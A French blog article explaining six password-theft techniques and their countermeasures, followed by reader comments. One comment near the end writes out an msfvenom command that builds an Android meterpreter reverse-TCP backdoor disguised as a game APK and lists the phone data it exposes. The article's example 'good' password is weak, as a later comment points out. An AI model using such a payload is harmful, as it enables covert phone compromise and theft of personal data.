Dans cet article nous allons expliquer comment se protéger contre un pirate qui pourrait chercher à trouver votre mot de passe.
Le but de l’article est de sensibiliser sur ces 6 techniques afin d’établir des contre-mesures servant à sécuriser nos mots de passe. Les techniques présentées ne sont pas forcément nouvelles, mais les méthodes de prévention ne sont pas toujours maîtrisées, d’où la nécessité de cet article.

comment trouver un mot de passe

Cet article vous servira notamment de ligne de conduite pour ne pas vous faire pirater en ligne et garder vos informations en sureté.

Note : il n’est pas légal de récupérer le mot de passe d’une personne qui ne vous en a pas donner pleinement l’autorisation auparavant (on parle bien ici de hacking éthique et non pas de piratage).

Comment le pirate cherche-t-il à trouver un mot de passe ?

1. L’attaque par brute force

comment trouver un mot de passe par bruteforce

On dit que n’importe quel mot de passe peut être cassé par brute force. Ce qui est vrai.
Mais, et le « mais » a toute son importance, le temps pour y arriver peut être long, très long.

Quand je parle de « très long », on peut par exemple attendre des centaines de milliers d’années.

Ce temps est déterminé à la fois par la complexité du mot de passe et par la puissance de la machine qui essaie de le trouver.

L’attaque par brute force teste « bêtement » toutes les combinaisons de nombres, lettres et caractères spéciaux jusqu’à trouver le mot de passe voulu. Elle peut aussi être utilisée via une liste de mots clés (attaque par dictionnaire) ou par modèles de mot de passe.

Contre-mesure: Utilisez des mots de passe longs et complexes. Je donne des astuces pour les retenir dans cet article et dans celui-ci : Taper ses mots de passe en toute sécurité et comment créer vos mots de passe de la meilleure des façons. Utilisez des combinaisons de lettres en minuscules, majuscules avec des caractères spéciaux ou des nombres. Les gestionnaires de mot de passe peuvent également vous aider.

Exemple de mauvais mots de passe :

  • abcdefghijklmnopqrstuvwxyz : Le mot de passe est certes long, mais très peu complexe.
  • *e3Q : Le mot de passe est complexe mais très court.
  • JeanDupond67 : Le mot de passe est correct en longueur et plutôt complexe, mais avoir son nom, département ou autres informations facilement trouvables par modèle ou dans un dictionnaire n’est pas recommandé (du tout).

Exemple de bon mot de passe :

  • J34N-DuP0Nd-six7 : Le mot de passe est correct en longueur et en complexité. Il est également plutôt facile à retenir s’il s’agit d’un acronyme ou d’un code qui nous dit quelque chose. De plus, il n’est certainement pas dans un dictionnaire. SAUF que maintenant qu’il est écrit sur cette page, il devient naturellement un mauvais mot de passe. Car votre mot de passe ne doit pas apparaître du tout sur internet.

2. Le Social Engineering (ingénierie sociale)

social-engineering

Comment trouver un mot de passe de n’importe quelle personne ?

Réponse -> Demandez-lui gentiment !

Cette réponse repose sur le principe du Social engineering (ingénierie sociale). Il s’agit de manipuler une personne pour qu’elle ait confiance en son pirate afin de lui fournir d’elle même une information sensible en pensant bien faire. Je répète que c’est le plus gros problème en sécurité informatique, et que contrairement à ce que dit l’image ci-dessus, il y a un patch à la « stupidité humaine » : la sensibilisation et la méfiance.

Le Social Engineering s’étend sur des domaines différents, il n’y a pas que des mots de passe qui peuvent être récupérés par ce procédé mais aussi des numéros de cartes bancaires, des données privées liées à une personne particulière, etc…

Contre-mesure: C’est un point extrêmement important et vous devez vraiment faire attention à ce que l’on vous demande. Préférez donner votre mot de passe (si déjà c’est absolument nécessaire) à une personne en étant en face d’elle, puis changez-le.

Ne faites pas confiance aveugle aux personnes que vous ne connaissez pas, et faites également attention aux personnes que vous connaissez, elles se sont potentiellement faites pirater.

Pour l’anecdote, j’avais l’habitude de parler à une collègue sur « Windows Live Messenger » à l’époque (ancêtre de Skype). Lorsqu’un jour, elle me demande subitement de l’aider, elle veut absolument que j’appelle un numéro surtaxé pour obtenir un code d’un jeu en toute urgence. Vu la situation, je prépare mon téléphone, mais au lieu d’appeler le numéro en question, je lui envoie un SMS pour lui demander si c’est bien elle qui me demande cela, car un tel comportement semblait quelque peu suspect. Vous l’aurez deviné, son compte a été piraté, aucun moyen pour l’antivirus de le savoir, c’était entre moi et le pirate.

3. Les Malwares (Chevaux de Troie, Keyloggers… etc)

copier_coller

Plutôt radical, lorsqu’un pirate envoie un programme malveillant du type keylogger, il reçoit tout ce que sa victime tape au clavier, que le site soit en https ou non, que le mot de passe soit caché par des étoiles ou non. Il existe énormément de malwares tous plus sophistiqués les uns par rapport aux autres. Ils prennent également diverses formes : applications mobiles, extensions de navigateur…etc.

Contre-mesure: Ne vous connectez pas depuis un ordinateur qui ne vous appartient pas, encore moins si vous vous connectez à votre banque. Vous pouvez utiliser des claviers virtuels, des logiciels anti-keyloggers ou d’autres outils spécialisés. Mais n’oubliez pas d’installer et de garder à jour un antivirus. Restez aussi méfiant, ne téléchargez pas n’importe quoi sur ordinateur ni sur smartphone.

4. Le phishing

phishing hameçonnage

Le Phishing est l’une des méthodes les plus répandues pour obtenir un mot de passe, voici par exemple une personne qui essayait de me pirater.
Lors d’une attaque par phishing, le pirate va typiquement envoyer un mail (mais il peut s’agir d’un site web ou d’une application pour smartphones) à une personne en se faisant passer pour quelqu’un d’autre.

Il s’agit d’une technique de Social Engineering spécifique, qui mérite d’être citée à part tant elle est populaire.

Lorsque la personne ciblée se connecte sur le faux site ou d’une manière générale donne ses informations à tort, le pirate récupère tout et part avec. Et c’est trop tard pour vous !

Ces pages de phishing sont d’ailleurs régulièrement publiées sur des sites d’hébergement gratuits, ce qui nous donne un indice.

Contre-mesure: Les attaques par Phishing sont très faciles à éviter. L’URL du faux site est forcément différente du site original. Par exemple, faccbook.com n’est pas facebook.com, vérifiez donc l’URL d’un site avant d’y transmettre des informations. Plus d’informations sur le phishing. Vérifiez également la véracité du message en question et n’agissez jamais trop vite.

5. Les tables rainbow

table rainbow

Attention, partie technique en vue. Une table Rainbow est une grosse liste de hashs pré-calculés pour toutes les combinaisons possibles de caractères. Un hash d’un mot de passe est obtenu à travers des algorithmes mathématiques du type md5 permettant de transformer un mot de passe en quelque chose de non reconnaissable.

Voici un exemple de hash du mot « salut » en md5 :

3ed7dceaf266cafef032b9d5db224717

Un hash est un chiffrage à sens unique, cela veut dire qu’avec le hash en question, il n’y a aucun algorithme permettant de faire la méthode inverse pour retrouver le mot de passe.

Le hash est d’ailleurs supposé unique, c’est à dire que le hash de « salut » ne sera pas le même que « sAlut ».

La méthode de stockage des mots de passe la plus connue pour les sites web est d’ailleurs le hachage des mots de passe.

« Mais alors comment vérifie-t-on que le mot de passe est correct lorsqu’on se connecte, si on ne peut pas récupérer le mot de passe depuis son hash ? »

En effet, il n’y a pas d’algorithme de déchiffrement, mais on recalcule simplement le hash et on le compare à celui stocké dans la base de données. En fait, les tables rainbow sont similaires aux attaques par brute-force, elles s’appliquent simplement sur les hash et non pas sur les mots de passe « en texte plein ».

La technique des tables rainbow est donc en quelque sorte une brute-force sur les hashs.

Contre-mesure: Même chose que pour la brute-force, soyez sûrs de la complexité de vos mots de passe. Normalement c’est surtout à l’administrateur du site de s’assurer que le calcul des hashs soit performant. Et pour cela il existe différents algorithmes de hachage ainsi que différentes méthodes pour rendre unique les hashs (sel de hachage).

6. Deviner le mot de passe

deviner mot de passe

Pour savoir comment un pirate peut trouver un mot de passe en le devinant, je vais expliquer cette sixième technique avec un exemple tout simple :
Lors de la saisie incorrecte et répétée de votre mot de passe sous certains systèmes (comme Windows), on obtient une indication sur votre mot de passe que l’on vous avez choisi de définir lors de la création du mot de passe en question.

Cette indication est censée permettre uniquement au propriétaire du compte de se rappeler de son mot de passe. Seulement, une indication du type « mon nom de famille », revient au même que de donner directement son mot de passe à tout le monde.

Le problème est le même avec les réponses aux questions secrètes que certains sites proposent de définir… S’il vous plaît, ne dites pas la vérité lorsque la question est « Quel est votre lieu de naissance ? »… Et déjà, quelle est cette idée de proposer cette question en tant que question secrète ??

Contre-mesure: N’utilisez pas vos noms, prénoms, date de naissance, numéros de téléphone, âge etc… dans vos mots de passe. Créez des mots de passe que seul VOUS connaissez, qui sont un minimum compliqués à deviner. Ne donnez pas non plus d’indications sur votre mot de passe autre part. Et enfin, ne donnez aucune information trop facile à deviner en tant que réponse à une « question secrète ».

EDIT: Deux autres moyens indiqués par un visiteur dans les commentaires :

7) Si quelqu’un laisse son ordinateur sans surveillance, il y a un moyen évident d’obtenir toutes sortes d’informations privées sur votre ordinateur. Cela montre bien que partir en laissant son ordinateur non verrouillé peut poser de très gros problèmes.

Tous les comptes où vous êtes connectés sont d’ailleurs accessibles. Imaginez que c’est comme si vous partiez en laissant la porte de votre maison grande ouverte !

Contre-mesure: Verrouiller sa session si l’on quitte son ordinateur dans un lieu public. Et éviter d’utiliser des ordinateurs qui ne vous appartiennent pas…

8) Quand un mot de passe est trop complexe, un grand pourcentage de internautes écrivent le mot de passe sur un papier qu’ils collent à l’intérieur du premier tiroir de leur bureau. Je pense qu’il n’y a pas besoin d’expliquer à quel point cette idée est risquée, si de mauvaises personnes fréquentes la même pièce que vous.

PS : Je ne fournis pas de support pour vous aider à trouver un mot de passe qui ne vous appartient pas, et ce peu importe la raison, inutile de demander.

Articles similaires

85 Commentaires
Cliquez ici pour ajouter un commentaire

  • koussaila seggar
    12 février 2016 3 h 44 min

    Bonjour Michel , je me demande ses quoi la diféranse entre système 32 bit et 64 bit et aussi je me demande si je peux remplacer mon 32 bit par 64 bit (Windows 7)

    Répondre
    • Répondre
      • bon soir michel juste une où deux chose à savoir peuvent être utile niveau sécurité .

        ne pas désactiver les comptes après des échecs de connexion.
        une stratégie de défense courante contre une attaque brute force.

        consiste à désactiver automatiquement un compte après un certain nombre
        de tentatives de connexion infructueuses.

        dans la plupart des cas le compte peut être réactivé automatiquement après
        un certain délai ou l’utilisateur peut devoir contacter l’administrateur afin que le
        compte soit réactivé.

        dans un cas comme dans l’autre la désactivation automatique des comptes utilisateurs
        est un mauvais mécanisme de sécurité pour lutter contre une attaque brute force.

        en premier lieu en désactivant les comptes. le système a échangé une vulnérabilité
        de contournement d’authentification contre une possibilité d’attaque dos ( déni de service )

        en effet si un attaquant peut désactiver un compte après 3 tentatives infructueuses toutes
        les 30 minutes par exemple. il peut effectivement empêcher cet utilisateur d’accéder au système.

        imaginez les dégâts que pourrait causer une attaque brute force si elle était utilisée contre
        un compte administrateur avec un tel mécanisme en place.

        en second lieu le verrouillage des comptes est inefficace contre les attaques par
        password spraying. ou certaines attaques par dictionnaire.

        en effet elles sont focalisées sur les mots de passe alors que ce mécanisme de verrouillage
        suppose que l’attaquant garde le nom d’utilisateur.

        et essaie de deviner le mot de passe. dans ces cas de figure un attaquant pourrait
        effectuer des milliers de tentatives de connexion. et même si chacune d’entre elles échoue.

        le système n’enregistrera qu’une seule connexion incorrecte par compte.

        mettre un délai après chaque échec de connexion.

        une meilleure technique pour contrer les attaques brute force consiste à retarder
        progressivement la réponse de la page après l’échec des tentatives de connexion.

        après la première tentative de connexion échouée. par exemple la réponse sera retardée
        d’une seconde. après le deuxième échec la réponse est retardée de deux secondes

        et ainsi de suite. l’implémentation de ce type de technique dit de délai
        incrémentiel. peut rendre totalement inefficace les outils automatisés de brute force.
        car le temps nécessaire pour effectuer des essais sera fortement rallongé.
        sûr ceux très bonne soirée michel .

        Répondre
  • Bonjour Michel
    j ai reçu un mms d une personne que je connais, je l ai ouvert, il c est afficher seulement 2 secondes, mais j ai eu le temps de le voir et de reconnaître mon émail. Penses tu que c est un keylogger? Je suis allè dans mes fichers , et je l ai mis a la corbeil. Y a t il danger? Qu’en penses tu?

    Répondre
  • Bonjour genillon,

    Par mesure de sécurité il serait préférable de supprimer ton compte Hangout (Google +) si tu en as un de synchronisé avec ton compte Google Gmail sur ton Smartphone Android.

    Ensuite il existe une parade relativement simple pour limiter ce type de « piratage » par MMS, mais elle dépend du type de Smartphone que tu as en ta possession. Personnellement j’ai un Samsung S5 Active qui me permet d’activer son mode « Ultra Economie d’Energie ». Ce dernier désactive pratiquement tous les services et les applications inutiles, hormis la réception/envoi de SMS, d’appels téléphonique, Alarme, Contacts téléphonique…

    Le piratage par MMS d’un Smartphone peut se faire en toute transparence et discrétion sans que le propriétaire sans rende compte, malheureusement. Lorsque ce type de MMS s’affiche en réception il est déjà trop tard puisqu’il s’efface automatiquement comme tu as pu le constater.

    Autre utilitaire Android très pratique contre ce genre d’action malveillante que je conseille, mais qui n’engage que moi bien évidemment. J’utilise l’application gratuite Android « Dois-je répondre ? ».

    Cette application (Dois-je répondre?) permet de bloquer automatiquement tous les appels téléphoniques intrusifs et douteux, même en mode « Ultra Economie d’Energie ». Cette application est synchronisée avec une base de données en ligne officielle de tous les numéros de téléphones référencés comme « parasites » voir « frauduleux »… C’est aussi une précaution à ne pas négliger, car je crois que certains appels téléphoniques fictifs (malveillants) sont utilisés pour obtenir une réponse du propriétaire et envoyer dans la foulée un MMS « malveillant »…

    Bien évidemment, il est recommandé d’installer un antivirus payant sur son Smartphone.

    Pourrais-tu préciser quand tu dit avoir reconnu ton email ? Quel rapport avec ce MMS ?

    Répondre
  • Dominique Le Goff
    3 avril 2016 13 h 12 min

    Bonjour Michel.
    Je n’arrive pas à reconfigurer mon compte mail sur mon nouvel Iphone. Ce compte je l’utilise depuis de très nombreuses années. Le fournisseur était cegetel. Il est depuis passé à neuf puis sfr. A priori j’ai le bon mot de passe mais quand je souhaite configurer ce compte sur mon iphone je me fais jeter : mot de passe ou nom utilisateur erroné ! Sur mon Ipad je reçois bien mais mails cegetel. Pouvez vous m’aider ? Merci d’avance

    Répondre
    • Bonjour Dominique, je pense que ce problème est très spécifique à la configuration du compte et de l’appareil. Par conséquent je ne pourrais aider efficacement à distance. Est-ce qu’il est possible de se connecter au compte en question hors du iphone ?

      Répondre
      • LE GOFF Dominique
        3 avril 2016 18 h 41 min

        Tout d’abord merci pour cette réponse rapide. Pour l’instant je reçois sans problème les mail de mon adresse cegetel sur mon IPad et mon ancien iPhone. C’est lorsque je veux ajouter ce compte mail à mon nouveau telephone Iphone également que je n’arrive pas à passer l’étape de configuration du POP ! Le mot de passe ne semble pas correct.

        Répondre
        • Je pense que le message d’erreur par défaut est ‘le mot de passe est invalide’ mais le problème est peut-être lié à la configuration POP en question.

          Répondre
          • Dominique Le Goff
            3 avril 2016 19 h 02 min

            J’ai contacté mon opérateur actuel Bouygue qui m’a confirmé la configuration POP et SMTP à rentrer ainsi que les numéros de port de ces serveurs. Pop.sfr.fr et SMTP.sfr.fr

          • Dominique le goff
            4 avril 2016 16 h 54 min

            Problème résolu. J’ai tout simplement demander à SFR un nouveau mot de passe qui fonctionne. Merci pour le temps que vous m’avez accordé. Cordialement

          • Ah parfait, merci pour le retour !

  • Rys Sébastien
    14 mai 2016 13 h 33 min

    merci pour le tuto mais comment se protégé de programme qui fonctionne sous linux ou kali qui lorsque l’on démarre un pc avec ce programme sur cd te décrypte ça en moins de temps qu’il ne faut pour nle dire. Exemple Ophcrack
    merci beaucoup

    Répondre
  • BOnjour Rys,
    Votre quesiton est relativement « tortueuse » (humour) puisque la seule façon de savoir qui fait quoi, comment et pourquoi sur une machine quelque soit l’OS, est de prendre le temps nécessaire pour décortiquer, détecter et diagnostiquer chaque processus, chaque service, chaque connexion et chaque port un par un. Cela implique une connaissance parfaite de tous ces éléments d’information. Croire qu’il suffit d’installer tel ou tel logiciel pour protéger totalement une machine est illusoire.

    Concernant l’OS Linux, je vous invite dans un premier temps à faire un bilan rapide des programmes et ports qui écoutent sur votre système Linux avec la commande suivante:

    # :www devra être remplacé par le protocole ou le port sollicité

    netstat -lpt | grep LISTEN | grep :www

    Sauvegardez dans un bloc notes le résultat et réalisez vos recherches sur chaque programmes et ports qui écoutent. Au terme de ce travail de fourmis vous serez à même d’établir si oui ou non votre système est infecté par un programme malveillant ou autres parasites… Par analogie à l’OS Windows, je connais envrion 98% des processus, des services, des ports qui travaillent, cela me permet en temps réel via PATRIOT NG de savoir si un intrus tente de s’introduire ou si un processus ou service est suspect. Ensuite je suis en mesure de faire des comparatifs hebdomadaires de toute ma base de registres, de services, de processus, des connexions actives et des programmes installés en fonction de mon activité journalière.

    Le principe est donc le même quelque que soit l’OS installé. Il existe des cas vraiment scabreux du style (un grand classique) le port 139 sous OS Windows qui correspond au NetBios. Même si le NetBIOS est arrêté et désactivé définitivement, on peut observer rarement par exemple avec PATRIOT NG que le « Système » FORCE l’activation et l’ouverture du port 139 ! Sous Linux nous observons ce même phénomène avec d’autres ports et programmes. J’ai pris un exemple « bateau » mais il en existe des tonnes ! 🙂

    A bientôt,
    Diki

    Répondre
  • […] En l’occurrence, le besoin ici est de lutter contre les spammers et contre les tentatives de cassage de mots de passe. […]

    Répondre
  • […] 10 à 12 fois de deviner le bon code en essayant des séries de chiffres différentes (attaque par force brute), Facebook a bloqué ses […]

    Répondre
  • Bonjour,
    Dire que le mot de passe J34N-DuP0Nd-six7 est bon est un terrible conseil : aujourd’hui les algorithme de cassage de mots de passe prennent en compte la substitution de caractères, et ce mot de passe reste fondamentalement le pire possible : prenom-nom-année.
    Le meilleur conseil à donner à d’associer deux à trois mots n’ayant aucun lien sémantiques entre eux et que l’on ne peut déduire en connaissant l’utilisateur.
    Plusieurs articles de MISC traitent du sujet, le dernier étant il y a 2 ou 3 numéros.

    Répondre
    • Bonjour Jonathan, c’est juste, merci pour la remarque pertinente !

      Répondre
      • bonjour michel le brute force très bon sujet .
        cependant le brute force ce n’est pas que ça contrairement aux idées reçues.

        en effet les attaques brute force ne servent pas qu’a deviner des identifiants
        ou des mots de passe. elles servent souvent de vecteurs pour lancer d’autres attaques
        et exploiter les vulnérabilités de certains systèmes.

        problèmes de droits ( idor )
        via devinette d’identifiants en cas de défaut de contrôle d’accès permettant d’accéder
        à des données ou des fichiers etc.

        fuzzing ( recherche de contenus )

        via utilisation d’un dictionnaire pour trouver des fichiers non répertoriés sur l’interface
        d’une application par exemple.

        énumération d’utilisateurs en cas de mauvaise configuration .
        permettant d’offrir d’autres options à un attaquant comme cibler des utilisateurs
        via du phishing par exemple.

        le password spraying est une autre variante d’attaque brute force.
        dans ce cas de figure il s’agit pour un attaquant de tester des mots de passe.

        couramment utilisés pour obtenir un accès à un ou plusieurs comptes utilisateurs.
        en effet. les attaques brute force traditionnelles tentent d’obtenir un accès non autorisé
        à un seul compte en devinant le mot de passe.

        ce qui peut rapidement entraîner le verrouillage du compte ciblé.
        car les politiques de verrouillage de compte couramment utilisées.

        autorisent généralement un nombre limité de tentatives infructueuses .
        cependant le verrouillage de comptes reste une mauvaise idée.

        ainsi les attaques par password spraying sont non seulement des tentatives d’évitement
        de ce type de mécanismes de sécurité . mais se révèlent très efficaces.

        les attaquants partent en effet du principe qu’au sein d’un grand groupe de personnes
        il est probable qu’il y en ait au moins une qui utilise un mot de passe commun.

        et c’est malheureusement trop souvent le cas.
        voilà pour la petite info . je te souhaite une très bonne année .
        ainsi que de joyeuses fêtes

        Répondre
  • Pour trouver un mot de passe à la fois résistant aux attaques par force brute, dictionnaires et tables arc en ciel, mais qui reste facilement mémorable, la méthode Diceware est très utile : https://fr.wikipedia.org/wiki/Diceware

    Répondre
  • Bonsoir,

    Je decouvre votre blog très intéréssant ce soir, car mon père a été victime de « Social engineering »…

    J’ai offert un pc a mon père …

    Une pub est apparu en disant que son pc avait un virus et qu’il devait absolument appeler le numero de telephone qui s’affichait pour qu’un soit disant technicien puisse l’aider… De ce fait mon papa a cru bien faire pour « sauver » son pc. Et a donc appelé le technicien et lui a donné son mot de passe de pc… heureusement il a refusé de donner son numero de carte bleue pour payer un soit disant anti virus a 200€….

    Pour moi cette histoire me parait impenssable, mais c’est bien deroulé cette apres midi, et il a fallu que moi et mon conjoint appellions mon pere pr lui dire 10fois d’eteindre le pc et de ne pas repondre aux rappels des techniciens…. car mon pere est de ceux qui font plus confiance aux « titre, medaille et constumes »: « Mais c’est un technicien, il sait mieux que vous ce qu’il fait qd même! »
    Le danger est surtout le fait de laissé des gens qui ne maitrise pas ts les « mauvais » aspect du web et qui malheureusement ne savent pas oú il doivent être méfiant, et qu’elle attitude adopté, sans suveillance (car nous n’habitons pas avec lui)…

    Il en va des pc et des smartphones…

    En offrant le pc a mon père j’ai cru bien faire, mais on n’offre pas une ferrari a qqn qui ne sait faire que du velo… car mm si nous lui disont de faire attention, il sait pas où et à quoi faire attention…

    Répondre
    • Bonjour,
      Merci beaucoup à vous pour votre visite et votre témoignage !
      Vous avez effectivement bien fait de sensibiliser votre père qui était effectivement prêt à se faire avoir… Et bien qu’il soit logique de faire confiance au titre, médaille et costume, encore faudrait-il le prouver/confirmer… et en l’occurrence ce n’était pas le cas ici.
      Excellente continuation à vous et à votre père.

      Répondre
  • salut michel merci pour touts les réponse au qu’elle tu à répondu avec beaucoup de bon sens. voici une technique utilisée
    par les pirate que les gens doive savoir au plus vite? pour sans protéger surtout sur téléphones avec androide.
    bien entendu je donne pas tout le code c’est juste pour que les gens voie le principe utilisée par les pirate.

    un cheval de troie backdoor contre un téléphone androide. il utilise kali linux et metasploit pour crée un jeu.
    on va dire mario apk il vont mettre leur application apk sur un site de téléchargement gratuit. ou l’envoyer par e-mail
    à une victime ou à une liste d’adresse d’e-mail. pour le créer il vont utilisé un module de metasploit.

    appelé msfve nom avec la commande suivante 1 msfvenom-p androide /meterpreter /reverse-tcp lhost = 192.168.0.10.r
    > /root/jeu mario apk lhost = 192.168.0.1O une fois la connexion établie avec le téléphone il pourront .
    voir tous les numéros de téléphone ces appels en absences émis et reçu voir ces sms photo vidéos et bien d’autres ?

    Répondre

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Vous devez remplir ce champ
Vous devez remplir ce champ
Veuillez saisir une adresse e-mail valide.

Menu